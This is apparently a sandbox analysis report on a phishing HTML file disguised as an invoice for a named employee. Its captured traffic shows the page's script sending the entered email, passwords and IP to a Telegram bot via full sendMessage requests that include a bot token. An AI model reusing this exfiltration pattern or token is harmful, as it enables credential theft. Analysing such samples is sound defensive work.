Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
Invoice_charles.mesquita_PaymentUpdate.html

Overview

General Information

Sample name:Invoice_charles.mesquita_PaymentUpdate.html
Analysis ID:1648028
MD5:dc90cca6cc296a6750140d5ada2ae0a4
SHA1:ed093e3d9dfb92d7f1c481b17655ed8eb9aa0bdc
SHA256:18510c0f3b951e1f348a99ef04725cb19162508a762ae3340e0ef8d251819011
Infos:

Detection

HTMLPhisher
Score:84
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
AI detected suspicious Javascript
HTML document with suspicious name
HTML document with suspicious title
HTML file submission containing password form
Uses the Telegram API (likely for C&C communication)
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
None HTTPS page querying sensitive user data (password, username or email)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Invoice_charles.mesquita_PaymentUpdate.html MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,11913174507900724838,10422298326975698631,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
0.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    0.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-25T13:48:40.312967+010018100071Potentially Bad Traffic192.168.2.1649730149.154.167.220443TCP
      2025-03-25T13:48:41.153898+010018100071Potentially Bad Traffic192.168.2.1649731149.154.167.220443TCP
      2025-03-25T13:49:01.143700+010018100071Potentially Bad Traffic192.168.2.1649735149.154.167.220443TCP
      2025-03-25T13:49:01.890062+010018100071Potentially Bad Traffic192.168.2.1649741149.154.167.220443TCP

      Joe Sandbox Signatures

      • Phishing
      • Compliance
      • Software Vulnerabilities
      • Networking
      • System Summary
      • Stealing of Sensitive Information

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.0.pages.csv
      Source: Yara matchFile source: 0.1.pages.csv, type: HTML
      Source: Yara matchFile source: 0.2.pages.csv, type: HTML
      Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Invoice_charles.mesq... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script designed to steal user information and credentials. The script interacts with suspicious domains, further indicating malicious intent. Overall, this script poses a significant security risk and should be treated with caution.
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlTab title: Login
      Source: Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: Number of links: 0
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: Number of links: 0
      Source: Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: Title: Login does not match URL
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: Title: Login does not match URL
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: Has password / email / username input fields
      Source: Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: <input type="password" .../> found
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: <input type="password" .../> found
      Source: Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: No favicon
      Source: https://www.quiltercheviot.com/HTTP Parser: No favicon
      Source: Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: No <meta name="author".. found
      Source: Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: No <meta name="copyright".. found
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: No <meta name="copyright".. found
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: No <meta name="copyright".. found
      Source: file:///C:/Users/user/Desktop/Invoice_charles.mesquita_PaymentUpdate.htmlHTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49696 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49700 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49697 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49701 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.138.106.26:443 -> 192.168.2.16:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.138.106.63:443 -> 192.168.2.16:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.14.68:443 -> 192.168.2.16:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.16:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.16:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.16:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.16:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 217.114.85.70:443 -> 192.168.2.16:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.35.231:443 -> 192.168.2.16:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 173.222.103.192:443 -> 192.168.2.16:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.64.152.25:443 -> 192.168.2.16:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.64.152.25:443 -> 192.168.2.16:49755 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.8.54:443 -> 192.168.2.16:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.16:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.16:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.22.38.92:443 -> 192.168.2.16:49778 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.22.39.92:443 -> 192.168.2.16:49791 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.179.73.37:443 -> 192.168.2.16:49790 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.188.247.147:443 -> 192.168.2.16:49795 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49805 version: TLS 1.2
      Source: chrome.exeMemory has grown: Private usage: 0MB later: 32MB

      Networking

      barindex
      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:49730 -> 149.154.167.220:443
      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:49731 -> 149.154.167.220:443
      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:49735 -> 149.154.167.220:443
      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:49741 -> 149.154.167.220:443
      Source: unknownDNS query: name: api.telegram.org
      Source: unknownDNS query: name: api.telegram.org
      Source: unknownDNS query: name: api.telegram.org
      Source: unknownDNS query: name: api.telegram.org
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.227
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.227
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.227
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.227
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.227
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /quiltercheviot.com?size=800 HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /quiltercheviot.com?size=800 HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
      Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
      Source: global trafficHTTP traffic detected: GET /resolve?name=quiltercheviot.com&type=MX HTTP/1.1Host: dns.googleConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resolve?name=quiltercheviot.com&type=MX HTTP/1.1Host: dns.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bot6800467599:AAGHIthuSv3CWGlzgsGIwx9GWQJ2OnFzEfE/sendMessage?chat_id=6522132099&text=%F0%9F%94%B9%20First%20Password%20Attempt%20%F0%9F%94%B9%0A%0A%F0%9F%93%A7%20Email%3A%20charles.mesquita%40quiltercheviot.com%0A%F0%9F%94%91%20Password%201%3A%20hAhAhA%0A%F0%9F%8C%8D%20IP%3A%20161.77.13.20%0A%F0%9F%8F%B3%EF%B8%8F%20Country%3A%20US%0A%F0%9F%94%97%20Login%20URL%3A%20https%3A%2F%2Fmail.mxa-0036ff01.gslb.pphosted.com HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bot6800467599:AAGHIthuSv3CWGlzgsGIwx9GWQJ2OnFzEfE/sendMessage?chat_id=6522132099&text=%F0%9F%94%B9%20First%20Password%20Attempt%20%F0%9F%94%B9%0A%0A%F0%9F%93%A7%20Email%3A%20charles.mesquita%40quiltercheviot.com%0A%F0%9F%94%91%20Password%201%3A%20hAhAhA%0A%F0%9F%8C%8D%20IP%3A%20161.77.13.20%0A%F0%9F%8F%B3%EF%B8%8F%20Country%3A%20US%0A%F0%9F%94%97%20Login%20URL%3A%20https%3A%2F%2Fmail.mxa-0036ff01.gslb.pphosted.com HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bot6800467599:AAGHIthuSv3CWGlzgsGIwx9GWQJ2OnFzEfE/sendMessage?chat_id=6522132099&text=%F0%9F%94%B9%20Second%20Password%20Attempt%20%F0%9F%94%B9%0A%0A%F0%9F%93%A7%20Email%3A%20charles.mesquita%40quiltercheviot.com%0A%F0%9F%94%91%20Password%201%3A%20hAhAhA%0A%F0%9F%94%91%20Password%202%3A%20RUBBISH%0A%F0%9F%8C%8D%20IP%3A%20161.77.13.20%0A%F0%9F%8F%B3%EF%B8%8F%20Country%3A%20US%0A%F0%9F%94%97%20Login%20URL%3A%20https%3A%2F%2Fmail.mxa-0036ff01.gslb.pphosted.com HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: quiltercheviot.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bot6800467599:AAGHIthuSv3CWGlzgsGIwx9GWQJ2OnFzEfE/sendMessage?chat_id=6522132099&text=%F0%9F%94%B9%20Second%20Password%20Attempt%20%F0%9F%94%B9%0A%0A%F0%9F%93%A7%20Email%3A%20charles.mesquita%40quiltercheviot.com%0A%F0%9F%94%91%20Password%201%3A%20hAhAhA%0A%F0%9F%94%91%20Password%202%3A%20RUBBISH%0A%F0%9F%8C%8D%20IP%3A%20161.77.13.20%0A%F0%9F%8F%B3%EF%B8%8F%20Country%3A%20US%0A%F0%9F%94%97%20Login%20URL%3A%20https%3A%2F%2Fmail.mxa-0036ff01.gslb.pphosted.com HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /Content/css/dist/v3/global.css?v=2.5.0.20037 HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /4ad25c/globalassets/logos/qc-logos/qc_primary_logo_stkdleft1_rgb72.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /6419036/6235832/css/fonts.css HTTP/1.1Host: cloud.typography.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=270&height=260&quality=20&rmode=crop&format=jpeg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /ajax/libs/jsrender/1.0.6/jsrender.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
